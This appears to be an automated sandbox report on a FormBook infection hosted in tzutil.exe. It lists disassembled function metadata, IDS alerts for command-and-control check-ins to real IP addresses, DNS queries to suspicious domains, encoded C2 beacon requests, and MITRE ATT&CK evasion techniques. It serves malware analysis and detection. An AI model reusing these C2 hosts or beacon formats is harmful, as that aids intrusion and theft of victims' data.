String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 913ea494874a3a2c50b80ea45bc3c15f1d918670924d7214d12c639ef7598f31
Instruction ID: 042bccfcf4111f73343112ee42b55af3003b7ff1d3647dc030bf52e754d545ac
Opcode Fuzzy Hash: 913ea494874a3a2c50b80ea45bc3c15f1d918670924d7214d12c639ef7598f31
Instruction Fuzzy Hash: E8213276A00219AFDB10DF79DC40AEFB7F8EF5C654F480556E915E7200E731DA068BA1

Function 0312F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031702BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031702E7
RTL: Re-Waiting, xrefs: 0317031E

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: a60340b01457bf5be6179b96d1a2ebb8d1dbc00733a6e7002e2b95ac64f6e337
Instruction ID: a42b5dfe01a51fd526623ad68ebd56b4a05ffa8f7e2b96269b833f9ce73b3504
Opcode Fuzzy Hash: a60340b01457bf5be6179b96d1a2ebb8d1dbc00733a6e7002e2b95ac64f6e337
Instruction Fuzzy Hash: 26E19C356087419FD728CF28C884B2ABBF0FB8C714F180A59F5A58B2D1D774D996CB42

Function 0313BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 03177B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03177B7F
RTL: Re-Waiting, xrefs: 03177BAC

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 57969bed20e592dd02d981d042001aa0ac986e03669559e8600ad30d0a59d797
Instruction ID: e39dc4d1d4255ce88c158173c469dfe8d5c4590af4fb5ec4deeaf2cea70cbc76
Opcode Fuzzy Hash: 57969bed20e592dd02d981d042001aa0ac986e03669559e8600ad30d0a59d797
Instruction Fuzzy Hash: A241F4353057029FC724DE29C840B6AB7E9EF8E720F144A2DF95ADB680EB30E4458B91

Function 0313B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0317728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03177294
RTL: Resource at %p, xrefs: 031772A3
RTL: Re-Waiting, xrefs: 031772C1

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 8b5886b2f58993826dda046001af173422d161274f95acd9cb52e0ee5571d206
Instruction ID: accdad447bbabaed25b4a8d455858dc75f223b07e4b5a3b07d526ad5210bce09
Opcode Fuzzy Hash: 8b5886b2f58993826dda046001af173422d161274f95acd9cb52e0ee5571d206
Instruction Fuzzy Hash: 3E41D035704306AFC720DE25CC41F6AB7B5FF8D710F184A19F966AB280EB21E8568BD5

Function 031B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 031B238D
___swprintf_l.LIBCMT ref: 031B23B3

Strings

%%%u, xrefs: 031B2384
]:%u, xrefs: 031B23AA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 2a990c8f3d7b64ab28cce6282c841e090423b0af2b9233bd4b4fc526ba2b1694
Instruction ID: d072355237d87d6ea9c18928346bc3b58a5dc2d0646efe0a5661bf5497332b5c
Opcode Fuzzy Hash: 2a990c8f3d7b64ab28cce6282c841e090423b0af2b9233bd4b4fc526ba2b1694
Instruction Fuzzy Hash: 12315A76A106199FCB20DF69DC40BEEB7F8EF4C650F544555E849D7140EB30DA4A8B70

Function 03147D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03147E8B

Strings

-, xrefs: 03147DDD
+, xrefs: 03147DE8

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 59916e415d1d3a4818f9dce3b84e93e211bf7eb54b56eab3a0079c7f11119a1e
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 2B918170E0031A9BDB24DF69C891ABEB7A5FF4C720F58461AE875E72C4D73099818B60

Function 03109126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 03109191
@, xrefs: 03109175

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 342cb7ceb7420f6196d3d0f190331fdf7c0b300b40133fd25c8b9f6ee3352d8b
Instruction ID: 91f8d2bfb84ab6880c68807e95a85339e9870d1c4b20cfea03bdfccb60c73176
Opcode Fuzzy Hash: 342cb7ceb7420f6196d3d0f190331fdf7c0b300b40133fd25c8b9f6ee3352d8b
Instruction Fuzzy Hash: E8816775D012699BDB35DB94CC44BEEB7B8AF0C710F0445EAA909B7290E7709E91CFA0

Function 0318CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0318CFBD

Strings

@4Cw@4Cw, xrefs: 0318CFD5, 0318CFDA, 0318CFF1
@, xrefs: 0318CF0A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: fba70000925aa09a2b483ffe82421773c60e6f1a4cf267a51dd84071825652ae
Instruction ID: 5a58101554f5799734ef0f66a720cc87189266074ae27e460b8260db8ba41acb
Opcode Fuzzy Hash: fba70000925aa09a2b483ffe82421773c60e6f1a4cf267a51dd84071825652ae
Instruction Fuzzy Hash: 2D417E75A00714DFCB21EFA5D840AAEFBB8EF4DB00F04452AE915EB294D734D941CB65

Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 4x nop then xor eax, eax		9_2_00599B80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 4x nop then mov ebx, 00000004h		9_2_02EB04E4

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49900 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53145 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53129 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53125 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53114 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53136 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53120 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53122 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53138 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53126 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53140 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53130 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53142 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53117 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53113 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53134 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53104 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53133 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53123 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53139 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53143 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53112 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53128 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53127 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53146 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53118 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53135 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53119 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53132 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53131 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53144 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53124 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53141 -> 162.0.213.94:80

Source: Joe Sandbox View	ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GIGABITBANK-AS-APGigabitbankGlobalHK GIGABITBANK-AS-APGigabitbankGlobalHK
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA

Source:	DNS query: www.personal-loans-jp8.xyz
Source:	DNS query: www.siyue.xyz
Source:	DNS query: www.farukugurluakdogan.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /igto/?ahL=jjndrjuPIn2hz&K29=8YFnU67lyalxhD6YAq63dHcF/xhcFCtDVk0hyUkc2gzBxzKJj8V8IimbyLXPMQTMLAK7+VkEGKl8Gj8O4yEU8qEC1w2FZZ3CqCTV9KozHs3Tz6lE+0GGUrFl7yfd1ET9dx+BVAc= HTTP/1.1Host: www.redimpact.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /slxf/?K29=Mb3F8yBS6AlbUJPyZs3X69r2DqN8IvT5IyZZHGmk1vQlgc6dIBTXJS0PrtljhQmz1YN0gN0Ls4vblXiCECQJDAoigJx9f3iNuz4aYv9eSvskP5VpnyhZJ0QOlFlswaL7d1KBmz8=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /tma8/?K29=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+nNVd6Tj8SZ2+7RNw1/qCD+LV8ZMsKDJeBrRvlbyALL5zLd15wyU=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.cs0724sd92jj.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /wouj/?ahL=jjndrjuPIn2hz&K29=yWYB/R3wDrDMgv7/2h3mR36Svhbv8gHDqbTO7lKikOEauwAayMxscd89e9z4JUSFkkGyyfBsvTMtsJwN77reSgxnPdmtMD5avihqpJBRdkkD2f8itAXfl8WSacuACOBToGOGQWQ= HTTP/1.1Host: www.clientebradesco.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /4qyv/?K29=YhEDIJyIBDBVYSqg/FaaSQqWMygBCOgWZYLNoJq+YB+tZNzGQAjy4s0gWfbYy8w7+pcTl2oQj4oxHqFf55zNlc3DsUGtLEv5hvA87zMOkIiiPi8ruquKn/Z/ppEenRSay39fUXM=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.www00437.emailAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /rk2p/?K29=+pKvT+T6aI4mLrB8VovWrZ9aurXWw1oR3cjAxWZJwguM4Y26gXhm+92mk/Xvsm02xKxFuv5v6XNtx495ochGFgbGl1fBlLTtvoEL4mYbjiJf04cpXMCfMoNuVfdD1R6NV9hbkdA=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.anthonyholland.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /nuiv/?K29=7su7kyuPS/KHUrSSGVu7suWxHYkjtEW9rejMc2pMopiQn27w9XMUnUBYAhg6Q3mcdodvpFC3LruuFA+cjx07DQKRX2SozR9AvDHFrDouFcoiTaEhBB80Fgqmq/5kDH7ol5SPL+Q=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.726075.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /ve3g/?K29=OTcOv8w+bCTLwtzbPVHaVBaVlmgm7BOGOBYyNnUD5x742Zgn72+Avt/ao6tsWGE5AAzMA+xeSHuleySgj3Ruf3ZwlqvIEjNxSel8keC2Xwb1w7P8UoRCloIeFUJhKKlSUKrICZ0=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.oxilo.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /mx00/?K29=qileVsN1diZFcCO3Qsw4YZf+VstA9OzPNQ7Oa8/FkrUJR0uYa1wUZggpoqScYraC15jy36uBsEEpRc6ILD1+qn3sxTmn99lW3lhfvmyegl4mHUSFQDpcAgCp0FvLAl8XjhJr2UE=&ahL=jjndrjuPIn2hz HTTP/1.1Host: www.farukugurluakdogan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18

Source: global traffic	DNS traffic detected: DNS query: www.redimpact.online
Source: global traffic	DNS traffic detected: DNS query: www.personal-loans-jp8.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
Source: global traffic	DNS traffic detected: DNS query: www.cs0724sd92jj.cloud
Source: global traffic	DNS traffic detected: DNS query: www.clientebradesco.online
Source: global traffic	DNS traffic detected: DNS query: www.www00437.email
Source: global traffic	DNS traffic detected: DNS query: www.anthonyholland.net
Source: global traffic	DNS traffic detected: DNS query: www.726075.buzz
Source: global traffic	DNS traffic detected: DNS query: www.siyue.xyz
Source: global traffic	DNS traffic detected: DNS query: www.oxilo.info
Source: global traffic	DNS traffic detected: DNS query: www.farukugurluakdogan.xyz

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
